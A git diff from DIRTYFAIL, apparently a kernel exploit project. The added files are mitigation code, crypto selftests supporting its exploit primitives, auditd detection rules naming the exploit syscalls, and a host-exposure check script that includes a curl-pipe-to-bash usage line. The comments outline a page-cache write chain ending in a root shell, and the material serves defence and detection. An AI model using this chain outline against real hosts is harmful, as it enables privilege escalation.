+        "# DIRTYFAIL mitigations — blacklist modules that expose the\n"
+        "# Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284,\n"
+        "# CVE-2026-43500) page-cache write primitives.\n"
+        "#\n"
+        "# Generated by `dirtyfail --mitigate`. Remove with\n"
+        "# `dirtyfail --cleanup-mitigate` or by deleting this file.\n"
+        "\n");
+    if (n < 0 || (size_t)n >= sizeof(buf)) {
+        errno = EOVERFLOW;
+        return false;
+    }
+    size_t used = (size_t)n;
+
+    for (int i = 0; BLACKLIST[i].name; i++) {
+        n = snprintf(buf + used, sizeof(buf) - used,
+            "# %s\n"
+            "install %s /bin/false\n",
+            BLACKLIST[i].reason, BLACKLIST[i].name);
+        if (n < 0 || (size_t)n >= sizeof(buf) - used) {
+            errno = EOVERFLOW;
+            return false;
+        }
+        used += (size_t)n;
+    }
+    return write_file(MODPROBE_CONF, buf);
+}
+
+/* Step 2: try to unload every blacklisted module. Returns how many were
+ * loaded but could not be unloaded. */
+static int unload_blacklisted_modules(void)
+{
+    int failed = 0;
+    log_step("unloading currently-loaded modules:");
+    for (int i = 0; BLACKLIST[i].name; i++) {
+        printf("  %s: ", BLACKLIST[i].name);
+        fflush(stdout);
+        failed += rmmod_if_loaded(BLACKLIST[i].name);
+    }
+    return failed;
+}
+
+/* Step 3: set the AppArmor userns sysctl at runtime and persist it.
+ * Returns true only when SYSCTL_CONF was written. */
+static bool apply_apparmor_sysctl(void)
+{
+    int fd = open(AA_USERNS_SYSCTL, O_WRONLY);
+    if (fd < 0) {
+        log_hint("AppArmor sysctl not present (kernel without AA, or AA not loaded) — skipping");
+        return false;
+    }
+    if (write(fd, "1\n", 2) == 2)
+        log_ok("set apparmor_restrict_unprivileged_userns=1 (runtime)");
+    else
+        log_warn("could not set apparmor_restrict_unprivileged_userns: %s", strerror(errno));
+    close(fd);
+
+    /* Persist via sysctl.d */
+    const char *sysctl_content =
+        "# DIRTYFAIL mitigations — block unprivileged userns capability acquisition.\n"
+        "# This prevents the xfrm-ESP / RxRPC / GCM exploit infrastructure from\n"
+        "# obtaining CAP_NET_ADMIN inside a fresh user namespace.\n"
+        "kernel.apparmor_restrict_unprivileged_userns = 1\n";
+    if (!write_file(SYSCTL_CONF, sysctl_content)) {
+        log_warn("could not write %s: %s", SYSCTL_CONF, strerror(errno));
+        return false;
+    }
+    log_ok("wrote %s (persists across reboot)", SYSCTL_CONF);
+    return true;
+}
+
+/* Step 4: ask the kernel to drop the page cache; failure is reported, not fatal. */
+static void drop_page_cache(void)
+{
+    int fd = open("/proc/sys/vm/drop_caches", O_WRONLY);
+    if (fd < 0) {
+        log_warn("could not open /proc/sys/vm/drop_caches: %s", strerror(errno));
+        return;
+    }
+    ssize_t n = write(fd, "3\n", 2);
+    int err = (n < 0) ? errno : EIO;
+    close(fd);
+    if (n == 2) log_ok("dropped page cache");
+    else log_warn("could not drop page cache: %s", strerror(err));
+}
+
+/* Apply all mitigations after an interactive typed confirmation.
+ * Returns DF_TEST_ERROR when not root or when the modprobe blacklist
+ * cannot be written; DF_OK otherwise (including a declined confirmation).
+ * Failures in steps 2-4 are reported in the log/summary, not the result. */
+df_result_t mitigate_apply(void)
+{
+    log_step("DIRTYFAIL — defensive mitigation deployment");
+
+    if (!require_root()) return DF_TEST_ERROR;
+
+    log_warn("about to apply system-wide mitigations:");
+    log_warn("  1. blacklist algif_aead, esp4, esp6, authencesn, rxrpc via modprobe");
+    log_warn("  2. unload those modules if loaded");
+    log_warn("  3. set kernel.apparmor_restrict_unprivileged_userns=1 (where AA loaded)");
+    log_warn("  4. drop page cache");
+    fputc('\n', stderr);
+    log_warn("SIDE EFFECTS:");
+    log_warn("  - blacklisting esp4/esp6/authencesn BREAKS IPsec / strongSwan / libreswan VPNs");
+    log_warn("  - blacklisting rxrpc BREAKS AFS distributed file system clients");
+    log_warn("  - blacklisting algif_aead BREAKS userspace AEAD via AF_ALG (rare)");
+    fputc('\n', stderr);
+    log_warn("undo with `dirtyfail --cleanup-mitigate` (removes config files, leaves modules unloaded)");
+
+    if (!typed_confirm("DIRTYFAIL")) {
+        log_bad("confirmation declined — aborting");
+        return DF_OK;
+    }
+
+    if (!write_modprobe_blacklist()) {
+        log_bad("failed to write %s: %s", MODPROBE_CONF, strerror(errno));
+        return DF_TEST_ERROR;
+    }
+    log_ok("wrote %s", MODPROBE_CONF);
+
+    int unload_failures = unload_blacklisted_modules();
+    bool sysctl_persisted = apply_apparmor_sysctl();
+    drop_page_cache();
+
+    fputc('\n', stdout);
+    log_ok("=== mitigation summary ===");
+    log_ok("  modprobe blacklist: %s", MODPROBE_CONF);
+    if (sysctl_persisted)
+        log_ok("  sysctl persistence: %s", SYSCTL_CONF);
+    else
+        log_warn("  sysctl persistence: not written (see messages above)");
+    if (unload_failures == 0)
+        log_ok("  modules unloaded:   algif_aead, esp4, esp6, authencesn, rxrpc (where loaded)");
+    else
+        log_warn("  modules unloaded:   %d module(s) could NOT be unloaded and stay usable until"
+                 " unloaded manually or the host reboots", unload_failures);
+    fputc('\n', stdout);
+    log_hint("Re-verify with `dirtyfail --scan` — should now report most modes as");
+    log_hint("preconditions missing or mitigated.");
+    fputc('\n', stdout);
+    log_hint("Ultimate fix: install kernel update with f4c50a4034e6 backport.");
+    return DF_OK;
+}
+
+/* Remove one generated config file and log the outcome. A file that is
+ * already absent is reported as a hint, not an error. */
+static void remove_conf(const char *path)
+{
+    if (unlink(path) == 0) log_ok("removed %s", path);
+    else if (errno == ENOENT) log_hint("%s did not exist", path);
+    else log_bad("unlink %s: %s", path, strerror(errno));
+}
+
+/* Undo mitigate_apply()'s on-disk changes after a typed confirmation.
+ * Does not reload modules or touch the runtime sysctl value. */
+df_result_t mitigate_revert(void)
+{
+    log_step("DIRTYFAIL — revert mitigations");
+    if (!require_root()) return DF_TEST_ERROR;
+
+    log_warn("removing %s + %s", MODPROBE_CONF, SYSCTL_CONF);
+    log_warn("modules will NOT be auto-loaded — operator decides if/when");
+    if (!typed_confirm("DIRTYFAIL")) {
+        log_bad("confirmation declined");
+        return DF_OK;
+    }
+
+    remove_conf(MODPROBE_CONF);
+    remove_conf(SYSCTL_CONF);
+
+    log_hint("modules can be reloaded individually with `sudo modprobe <name>`");
+    log_hint("kernel.apparmor_restrict_unprivileged_userns keeps its current runtime value until changed via sysctl or reboot");
+    return DF_OK;
+}
diff --git a/modules/copy_fail_family/mitigate.h b/modules/copy_fail_family/mitigate.h
new file mode 100644
index 0000000..c6b0f46
--- /dev/null
+++ b/modules/copy_fail_family/mitigate.h
@@ -0,0 +1,47 @@
+/*
+ * DIRTYFAIL — mitigate.h
+ *
+ * Defensive companion to the exploit modes: applies all known
+ * mitigations for Copy Fail / Dirty Frag in one shot. Intended for
+ * sysadmins who want a fast "fix this until the kernel patch lands"
+ * deployment.
+ *
+ * What `--mitigate` does:
+ *
+ *   1. Writes /etc/modprobe.d/dirtyfail-mitigations.conf with
+ *      `install <module> /bin/false` blacklists for:
+ *        - algif_aead (Copy Fail authencesn primitive)
+ *        - esp4 + esp6 (Dirty Frag xfrm-ESP path)
+ *        - authencesn (AEAD template; also counted by tools/dirtyfail-check.sh)
+ *        - rxrpc (Dirty Frag RxRPC path)
+ *
+ *   2. rmmods any of those that are currently loaded.
+ *
+ *   3. Sets `kernel.apparmor_restrict_unprivileged_userns=1` (where
+ *      AppArmor is loaded). Persists via /etc/sysctl.d/.
+ *
+ *   4. Drops the page cache to evict any pre-existing page-cache
+ *      modifications.
+ *
+ *   5. Reports what it did so the operator can audit / undo.
+ *
+ * Caveats:
+ *   - Requires root.
+ *   - Disabling esp4/esp6 breaks IPsec / strongSwan.
+ *   - Disabling rxrpc breaks AFS clients.
+ *   - These are interim mitigations; the right fix is the kernel patch.
+ *
+ * Run with `--cleanup-mitigate` to undo (removes the blacklist conf,
+ * removes the sysctl conf, but does not reload modules or reset the
+ * runtime sysctl — operator decides if/when).
+ */
+
+#ifndef DIRTYFAIL_MITIGATE_H
+#define DIRTYFAIL_MITIGATE_H
+
+#include "common.h"
+
+df_result_t mitigate_apply(void);
+df_result_t mitigate_revert(void);
+
+#endif
diff --git a/modules/copy_fail_family/tests/test_aes_ecb.c b/modules/copy_fail_family/tests/test_aes_ecb.c
new file mode 100644
index 0000000..ea74077
--- /dev/null
+++ b/modules/copy_fail_family/tests/test_aes_ecb.c
@@ -0,0 +1,101 @@
+/*
+ * tests/test_aes_ecb.c
+ *
+ * Verifies that the kernel's AF_ALG `ecb(aes)` implementation produces
+ * the expected outputs for known AES-128-ECB test vectors. This is the
+ * primitive that copyfail_gcm.c uses to compute GCM keystream byte 0
+ * via the J0+1 counter block trick.
+ *
+ * If this test passes, the GCM exploit's brute-force loop is sound.
+ * If it fails, the kernel's AES implementation differs from spec — no
+ * exploit will produce the right STORE values.
+ * + * Linux-only. Uses the same AF_ALG primitives as copyfail_gcm.c. + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +static int failures = 0; + +#define ASSERT(cond, msg, ...) do { \ + if (!(cond)) { fprintf(stderr, "FAIL: " msg "\n", ##__VA_ARGS__); failures++; } \ + else { fprintf(stderr, " ok: " msg "\n", ##__VA_ARGS__); } \ +} while (0) + +static int alg_open_ecb_aes(const unsigned char key[16]) +{ + int s = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (s < 0) return -1; + struct sockaddr_alg sa = { .salg_family = AF_ALG }; + strcpy((char *)sa.salg_type, "skcipher"); + strcpy((char *)sa.salg_name, "ecb(aes)"); + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(s); return -1; } + if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 16) < 0) { close(s); return -1; } + return s; +} + +static int aes_ecb_encrypt(int s, const unsigned char in[16], unsigned char out[16]) +{ + int op = accept(s, NULL, NULL); + if (op < 0) return -1; + char cbuf[CMSG_SPACE(sizeof(int))] = {0}; + struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) }; + struct cmsghdr *c = CMSG_FIRSTHDR(&msg); + c->cmsg_level = SOL_ALG; c->cmsg_type = ALG_SET_OP; c->cmsg_len = CMSG_LEN(sizeof(int)); + *(int *)CMSG_DATA(c) = ALG_OP_ENCRYPT; + struct iovec iov = { .iov_base = (void *)in, .iov_len = 16 }; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + if (sendmsg(op, &msg, 0) != 16) { close(op); return -1; } + int n = read(op, out, 16); + close(op); + return n == 16 ? 
0 : -1; +} + +int main(void) +{ + /* NIST test vector: AES-128 ECB + * key = 000102030405060708090a0b0c0d0e0f + * pt = 000102030405060708090a0b0c0d0e0f + * ct = 0a940bb5416ef045f1c39458c653ea5a + */ + unsigned char key[16], in[16], out[16]; + for (int i = 0; i < 16; i++) { key[i] = i; in[i] = i; } + static const unsigned char expected[16] = { + 0x0a,0x94,0x0b,0xb5,0x41,0x6e,0xf0,0x45, + 0xf1,0xc3,0x94,0x58,0xc6,0x53,0xea,0x5a + }; + + int s = alg_open_ecb_aes(key); + ASSERT(s >= 0, "AF_ALG skcipher ecb(aes) bindable + keyable"); + if (s < 0) return 1; + + ASSERT(aes_ecb_encrypt(s, in, out) == 0, "single-block ECB encrypt completes"); + + ASSERT(memcmp(out, expected, 16) == 0, + "ECB(K=0..15, P=0..15) = 0a940bb5416ef045f1c39458c653ea5a"); + if (memcmp(out, expected, 16) != 0) { + fprintf(stderr, " got: "); + for (int i = 0; i < 16; i++) fprintf(stderr, "%02x", out[i]); + fprintf(stderr, "\n"); + } + + /* GCM J0+1 counter block sanity: nonce(12) || 0x00000002. byte 0 of + * the encrypted block is the keystream byte that XORs onto plaintext + * byte 0 in GCM. We don't verify against a specific GCM vector here + * (no canonical short test for this), just that the operation runs. */ + unsigned char counter[16]; + memset(counter, 0xab, 12); + counter[12] = 0; counter[13] = 0; counter[14] = 0; counter[15] = 2; + ASSERT(aes_ecb_encrypt(s, counter, out) == 0, + "GCM J0+1 counter block encrypt (keystream byte computation)"); + + close(s); + fprintf(stderr, "\n%d failure(s)\n", failures); + return failures > 0 ? 1 : 0; +} diff --git a/modules/copy_fail_family/tests/test_fcrypt.c b/modules/copy_fail_family/tests/test_fcrypt.c new file mode 100644 index 0000000..ae323bf --- /dev/null +++ b/modules/copy_fail_family/tests/test_fcrypt.c @@ -0,0 +1,84 @@ +/* + * tests/test_fcrypt.c + * + * Selftest for the rxkad fcrypt cipher implementation in src/fcrypt.c. + * Built standalone via `make test`. No DIRTYFAIL runtime needed. 
+ * + * Verifies: + * - All-zero key vector (catches gross structural bugs) + * - Non-zero key vector from kernel testmgr.h (catches subtle bugs + * in 7-bit packing or 11-bit ROR key schedule) + * - Brute-force harness convergence (sanity-checks predicate gating) + */ + +#include "../src/fcrypt.h" +#include "../src/common.h" + +#include +#include +#include +#include + +static int failures = 0; + +#define ASSERT(cond, msg, ...) do { \ + if (!(cond)) { \ + fprintf(stderr, "FAIL: " msg "\n", ##__VA_ARGS__); \ + failures++; \ + } else { \ + fprintf(stderr, " ok: " msg "\n", ##__VA_ARGS__); \ + } \ +} while (0) + +static bool predicate_match_first_byte(const uint8_t p[8]) +{ + return p[0] == 0xAB; +} + +int main(void) +{ + fcrypt_init(); + + /* Selftest covers both vectors. */ + ASSERT(fcrypt_selftest(), + "fcrypt_selftest passes (covers k=0 and k=1144...66 vectors)"); + + /* Spot-check vector 1 directly */ + fcrypt_ctx ctx; + uint8_t out[8]; + static const uint8_t k1[8] = {0,0,0,0,0,0,0,0}; + static const uint8_t c1[8] = {0x0E,0x09,0x00,0xC7,0x3E,0xF7,0xED,0x41}; + fcrypt_setkey(&ctx, k1); + fcrypt_decrypt(&ctx, out, c1); + ASSERT(memcmp(out, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) == 0, + "vector 1: decrypt(k=0, ct=0E0900C73EF7ED41) = 0000000000000000"); + + /* Spot-check vector 2 directly */ + static const uint8_t k2[8] = {0x11,0x44,0x77,0xAA,0xDD,0x00,0x33,0x66}; + static const uint8_t c2[8] = {0xD8,0xED,0x78,0x74,0x77,0xEC,0x06,0x80}; + static const uint8_t p2[8] = {0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0}; + fcrypt_setkey(&ctx, k2); + fcrypt_decrypt(&ctx, out, c2); + ASSERT(memcmp(out, p2, 8) == 0, + "vector 2: decrypt(k=11447 7AAD D003 366, ct=D8ED787477EC0680) = 123456789ABCDEF0"); + + /* Brute-force smoke test: search for K such that decrypt(C=0..7) starts with 0xAB. + * Predicate hit rate = 1/256, so ~256 iters expected. Hard cap at 1<<20. 
*/ + uint8_t key_out[8], pt_out[8]; + static const uint8_t test_ct[8] = {0,1,2,3,4,5,6,7}; + bool found = fcrypt_brute_force(test_ct, predicate_match_first_byte, + 1 << 20, (uint64_t)time(NULL), + "smoke", key_out, pt_out); + ASSERT(found, + "brute force converges on first-byte=0xAB predicate within 1M iters"); + if (found) { + /* Verify the discovered key actually produces the claimed plaintext */ + fcrypt_setkey(&ctx, key_out); + fcrypt_decrypt(&ctx, out, test_ct); + ASSERT(memcmp(out, pt_out, 8) == 0 && out[0] == 0xAB, + "discovered key produces claimed plaintext (roundtrip OK)"); + } + + fprintf(stderr, "\n%d failure(s)\n", failures); + return failures > 0 ? 1 : 0; +} diff --git a/modules/copy_fail_family/tools/99-dirtyfail.rules b/modules/copy_fail_family/tools/99-dirtyfail.rules new file mode 100644 index 0000000..9b7159b --- /dev/null +++ b/modules/copy_fail_family/tools/99-dirtyfail.rules @@ -0,0 +1,100 @@ +# DIRTYFAIL β€” auditd detection rules +# +# Drop into /etc/audit/rules.d/, then reload: +# +# sudo install -m 0640 99-dirtyfail.rules /etc/audit/rules.d/ +# sudo augenrules --load +# sudo systemctl restart auditd +# +# These rules generate audit events for the syscalls the DIRTYFAIL +# exploit chain uses. They are intentionally noisy on systems that +# legitimately use rootless containers, IPsec, or AFS β€” review the +# Tuning section before enabling on a production host. +# +# Search recorded events: +# +# sudo ausearch -k dirtyfail-xfrm +# sudo ausearch -k dirtyfail-rxkey +# sudo ausearch -k dirtyfail-userns +# +# Rules MUST stay on single lines β€” auditctl(8) does not honor +# backslash-newline continuations in rule files. +# +# Tested on: Debian 13, Ubuntu 24.04/26.04, AlmaLinux 10, Fedora 44. + +## ----------------------------------------------------------------- ## +## 1. 
XFRM netlink registration from a non-root account
+##
+## socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM) is an extremely strong
+## signal: legitimate use is "ip xfrm" (root) or `swanctl`/charon (root)
+## or networkd (root). An unprivileged account creating this socket
+## is the precondition for ESP v4/v6/GCM exploitation.
+##
+## socket() args: a0=family(16=AF_NETLINK) a2=protocol(6=NETLINK_XFRM)
+## auid filter: ignore kernel/system processes (auid=4294967295)
+## match interactive logins (auid >= 1000)
+## ----------------------------------------------------------------- ##
+-a always,exit -F arch=b64 -S socket -F a0=16 -F a2=6 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-xfrm
+-a always,exit -F arch=b32 -S socket -F a0=16 -F a2=6 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-xfrm
+
+## ----------------------------------------------------------------- ##
+## 2. add_key("rxrpc", ...) — RxRPC session-key registration
+##
+## The rxkad-handshake forgery requires registering a rxrpc-typed key
+## via add_key(2). The rule has no filter on the key type, so it logs
+## EVERY add_key(2) from a login session (auid >= 1000); confirm the
+## type in the event. Legitimate AFS use is expected as root/service.
+## ----------------------------------------------------------------- ##
+-a always,exit -F arch=b64 -S add_key -F auid>=1000 -F auid!=4294967295 -k dirtyfail-rxkey
+-a always,exit -F arch=b32 -S add_key -F auid>=1000 -F auid!=4294967295 -k dirtyfail-rxkey
+
+## ----------------------------------------------------------------- ##
+## 3. unshare(CLONE_NEWUSER) from interactive accounts
+##
+## CLONE_NEWUSER == 0x10000000 (268435456). Every DIRTYFAIL exploit mode
+## does this once. NOTE: clone(2)/clone3(2) can also pass CLONE_NEWUSER
+## and are NOT matched by this rule. WARNING: fires on every legitimate
+## `unshare -U`, podman/buildah container start, and chrome/firefox
+## sandbox spawn; low-fidelity noise to pair with the dirtyfail-xfrm key.
+## ----------------------------------------------------------------- ##
+-a always,exit -F arch=b64 -S unshare -F a0&268435456 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns
+-a always,exit -F arch=b32 -S unshare -F a0&268435456 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns
+
+## ----------------------------------------------------------------- ##
+## 4. AF_ALG socket creation — Copy Fail / GCM precondition
+##
+## socket(AF_ALG, ...). a0=38 (PF_ALG). Legitimate uses: cryptsetup,
+## kernel-side TLS offload, some QEMU paths. Suspicious from a shell
+## account.
+## ----------------------------------------------------------------- ##
+-a always,exit -F arch=b64 -S socket -F a0=38 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-afalg
+-a always,exit -F arch=b32 -S socket -F a0=38 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-afalg
+
+## ----------------------------------------------------------------- ##
+## 5. Directly watch /etc/passwd and /etc/shadow for in-place modifications
+##
+## A successful exploit modifies only the page-cache copy (which is what
+## PAM reads), so these watches are not expected to fire on the exploit
+## itself. They fire when /usr/bin/passwd, vipw, or anything else opens
+## the files for writing — baseline change detection, not DIRTYFAIL-specific.
+## ----------------------------------------------------------------- ##
+-w /etc/passwd -p wa -k dirtyfail-passwd-write
+-w /etc/shadow -p wa -k dirtyfail-shadow-write
+
+## ----------------------------------------------------------------- ##
+## Tuning notes
+##
+##   - On servers running rootless containers, dirtyfail-userns will be
+##     high-volume noise. Either drop rule 3, or filter on `comm!=podman`
+##     etc. for your specific runtime.
+##   - On IPsec gateways, dirtyfail-xfrm fires for every legitimate SA
+##     install. Drop the rule or filter `comm` to your VPN daemon.
+##   - Pair dirtyfail-userns + dirtyfail-xfrm with a SIEM correlation
+##     rule: "same auid emits both within 5 seconds" → high-confidence
+##     exploit-attempt alert.
+##
+## Note: the AppArmor `change_onexec` rule that an earlier draft
+## included is omitted — auditctl won't reliably match writes to
+## /proc/self/attr/exec via -F path because the path is per-pid.
+## Use the userns + xfrm pair instead for the bypass-detection signal.
+## ----------------------------------------------------------------- ##
diff --git a/modules/copy_fail_family/tools/dirtyfail-check.sh b/modules/copy_fail_family/tools/dirtyfail-check.sh
new file mode 100755
index 0000000..9ba849c
--- /dev/null
+++ b/modules/copy_fail_family/tools/dirtyfail-check.sh
@@ -0,0 +1,215 @@
+#!/bin/bash
+#
+# dirtyfail-check.sh — defensive precondition probe for sysadmins
+#
+# A standalone bash script that reports whether this Linux host is
+# exposed to Copy Fail (CVE-2026-31431) or Dirty Frag (CVE-2026-43284,
+# CVE-2026-43500) exploitation by an unprivileged user.
+#
+# Does NOT require building DIRTYFAIL. Read-only — does not modify
+# the system. Safe to run on production. Does not require root, but
+# some checks are more accurate when run as root (kernel module
+# inspection, sysctl reads).
+#
+# Usage:
+#   bash dirtyfail-check.sh
+#   # or pipe directly:
+#   curl -sSL https://raw.githubusercontent.com/KaraZajac/DIRTYFAIL/main/tools/dirtyfail-check.sh | bash
+#
+# Exit codes:
+#   0 = host is mitigated (kernel patched OR LSM blocks unprivileged path)
+#   1 = host is VULNERABLE to at least one exploit path
+#   2 = check error (couldn't determine state)
+
+set -u
+
+# ANSI colors only when stdout is a tty
+if [ -t 1 ]; then
+    RED='\033[1;31m'; YEL='\033[1;33m'; GRN='\033[1;32m'; CYN='\033[1;36m'; OFF='\033[0m'
+else
+    RED=''; YEL=''; GRN=''; CYN=''; OFF=''
+fi
+
+bad()  { printf "${RED}[!]${OFF} %s\n" "$*"; }
+warn() { printf "${YEL}[~]${OFF} %s\n" "$*"; }
+ok()   { printf "${GRN}[+]${OFF} %s\n" "$*"; }
+info() { printf "${CYN}[*]${OFF} %s\n" "$*"; }
+
+# Directories modprobe(8) reads its configuration from.
+MODPROBE_DIRS="/etc/modprobe.d /run/modprobe.d /usr/lib/modprobe.d /lib/modprobe.d"
+
+# is_builtin MODULE — true when MODULE is compiled into the kernel image,
+# in which case no modprobe.d rule can disable it.
+is_builtin() {
+    grep -q "/$1\.ko\$" "/lib/modules/$KVER/modules.builtin" 2>/dev/null && return 0
+    [ "$(modinfo -F filename "$1" 2>/dev/null)" = "(builtin)" ]
+}
+
+# ============================================================
+# 1. Kernel version
+# ============================================================
+KVER=$(uname -r)
+KMAJ=$(echo "$KVER" | cut -d. -f1)
+KMIN=$(echo "$KVER" | cut -d. -f2)
+KMIN=${KMIN%%[!0-9]*}
+info "kernel: $KVER ($(uname -m))"
+
+# An unparseable version is a check error (exit 2), not a verdict.
+case "$KMAJ.$KMIN" in
+    .*|*.|*[!0-9.]*) bad "could not parse kernel version '$KVER'"; exit 2 ;;
+esac
+
+# Affected kernel window per the CVEs:
+#   xfrm-ESP no-COW path: introduced 2017 (cac2661c53f3), fixed mainline
+#     f4c50a4034e6 (2026-05-07).
+#   algif_aead/authencesn: introduced 2017 (72548b093ee3), fixed
+#     mainline a664bf3d.
+#   rxkad page-cache write: introduced 2023-06 (2dc334f1a63a), no
+#     mainline patch yet at time of writing.
+# Kernels 4.10 .. ~6.20 are within the broad window; older kernels
+# may also be affected depending on backports.
+if [ "$KMAJ" -lt 4 ] || { [ "$KMAJ" -eq 4 ] && [ "$KMIN" -lt 10 ]; }; then
+    ok "kernel predates CVE introduction (cac2661c53f3, 2017-01)"
+    NOT_IN_WINDOW=1
+else
+    info "kernel within affected window — checking other preconditions"
+    NOT_IN_WINDOW=0
+fi
+
+# ============================================================
+# 2. Module presence + blacklist
+# ============================================================
+MODS_VULNERABLE=0
+MODS_BLACKLISTED=0
+echo ""
+info "module status:"
+for m in algif_aead authencesn esp4 esp6 rxrpc; do
+    if is_builtin "$m"; then
+        # Checked first: an install rule has no effect on built-in code.
+        warn "  $m: built into the kernel — cannot be blacklisted, exposes the primitive"
+        MODS_VULNERABLE=$((MODS_VULNERABLE + 1))
+    elif ! modinfo "$m" >/dev/null 2>&1; then
+        ok "  $m: not on disk (kernel build doesn't ship it)"
+    elif lsmod | grep -q "^$m\b"; then
+        # Checked before the blacklist: an install rule only blocks future loads.
+        warn "  $m: loaded — exposes the primitive"
+        MODS_VULNERABLE=$((MODS_VULNERABLE + 1))
+    elif grep -rqE "^\s*install\s+$m\s+/bin/false" $MODPROBE_DIRS 2>/dev/null; then
+        ok "  $m: blacklisted in modprobe.d (mitigated)"
+        MODS_BLACKLISTED=$((MODS_BLACKLISTED + 1))
+    else
+        warn "  $m: present on disk, autoloads on use — exposes the primitive"
+        MODS_VULNERABLE=$((MODS_VULNERABLE + 1))
+    fi
+done
+
+# ============================================================
+# 3. LSM / userns hardening
+# ============================================================
+echo ""
+info "LSM / userns hardening:"
+
+LSM_BLOCKS=0
+if [ -r /proc/sys/kernel/apparmor_restrict_unprivileged_userns ]; then
+    AA=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns 2>/dev/null)
+    if [ "$AA" != "1" ]; then
+        info "  apparmor_restrict_unprivileged_userns=$AA (not enforcing)"
+    elif ! command -v unshare >/dev/null 2>&1; then
+        ok "  apparmor_restrict_unprivileged_userns=1 (Ubuntu-style hardening active)"
+        # Without unshare(1) the probe would fail and be misread as "blocked".
+        warn "  empirical probe skipped: unshare(1) not installed — enforcement unconfirmed"
+    else
+        ok "  apparmor_restrict_unprivileged_userns=1 (Ubuntu-style hardening active)"
+        # Confirm caps are actually blocked via empirical probe
+        if ( unshare -U bash -c 'echo deny > /proc/self/setgroups' ) >/dev/null 2>&1; then
+            warn "  empirical probe: caps survived unshare — sysctl set but enforcement may be off"
+        else
+            ok "  empirical probe: unprivileged userns has no CAP_SYS_ADMIN — exploit infrastructure blocked"
+            LSM_BLOCKS=1
+        fi
+    fi
+else
+    info "  no AppArmor userns sysctl (kernel without AA, or AA not loaded)"
+fi
+
+if command -v getenforce >/dev/null 2>&1; then
+    SE=$(getenforce 2>/dev/null)
+    info "  SELinux: $SE"
+fi
+
+if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
+    UU=$(cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null)
+    if [ "$UU" = "0" ]; then
+        ok "  unprivileged_userns_clone=0 (userns creation blocked entirely)"
+        LSM_BLOCKS=1
+    fi
+fi
+
+if [ -r /proc/sys/user/max_user_namespaces ]; then
+    MAXNS=$(cat /proc/sys/user/max_user_namespaces 2>/dev/null)
+    if [ "$MAXNS" = "0" ]; then
+        ok "  user.max_user_namespaces=0 (userns creation blocked entirely)"
+        LSM_BLOCKS=1
+    fi
+fi
+
+# ============================================================
+# 4. PAM nullok (gates the rxrpc + backdoor → root step)
+# ============================================================
+echo ""
+info "PAM configuration (gates rxrpc/backdoor → real root):"
+PAM_NULLOK=0
+# -r so grep descends into /etc/pam.d/ (a bare directory argument lists
+# nothing); ^[^#]* so commented-out lines are not reported.
+NULLOK_FILES=$(grep -rlE "^[^#]*pam_unix\.so\s+.*nullok" /etc/pam.d/ 2>/dev/null)
+if [ -n "$NULLOK_FILES" ]; then
+    warn "  pam_unix nullok present — empty-password accounts can su to root"
+    PAM_NULLOK=1
+    printf '%s\n' "$NULLOK_FILES" | sed 's/^/      /'
+else
+    ok "  pam_unix nullok NOT enabled — empty-password trick won't drop a root shell"
+fi
+
+# ============================================================
+# 5. Verdict
+# ============================================================
+echo ""
+echo "════════════════════════════════════════════════════════════"
+echo " VERDICT"
+echo "════════════════════════════════════════════════════════════"
+
+if [ "$NOT_IN_WINDOW" = "1" ]; then
+    ok "kernel predates CVE introduction; no exposure"
+    exit 0
+elif [ "$LSM_BLOCKS" = "1" ]; then
+    ok "LSM-mitigated: unprivileged userns operations are blocked"
+    info "(kernel may still be vulnerable to root-level exploitation; ensure"
+    info " your distro's kernel update with f4c50a4034e6 backport is applied"
+    info " for full coverage.)"
+    exit 0
+elif [ "$MODS_VULNERABLE" = "0" ]; then
+    ok "all primitives blacklisted or unavailable"
+    exit 0
+else
+    bad "VULNERABLE: $MODS_VULNERABLE module(s) expose page-cache write primitives"
+    bad "and unprivileged userns operations are NOT blocked by an LSM."
+    if [ "$PAM_NULLOK" = "1" ]; then
+        bad "  + pam_unix nullok is enabled — exploit can drop into root via su"
+    fi
+    echo ""
+    info "Remediation options (pick one or combine):"
+    info "  1. Apply your distro's kernel update with f4c50a4034e6 backport"
+    info "     (best: fixes the bug at its source)"
+    info "  2. Install + run \`dirtyfail --mitigate\` (blacklists modules,"
+    info "     sets apparmor_restrict_unprivileged_userns=1)"
+    info "  3. Manual: edit /etc/modprobe.d/ to add"
+    info "       install algif_aead /bin/false"
+    info "       install authencesn /bin/false"
+    info "       install esp4 /bin/false"
+    info "       install esp6 /bin/false"
+    info "       install rxrpc /bin/false"
+    info "     then \`sudo rmmod\` each + \`sudo sysctl vm.drop_caches=3\`."
+    info "  4. Disable pam_unix nullok (removes the in-system su step that"
+    info "     converts a page-cache STORE into a real root shell)."
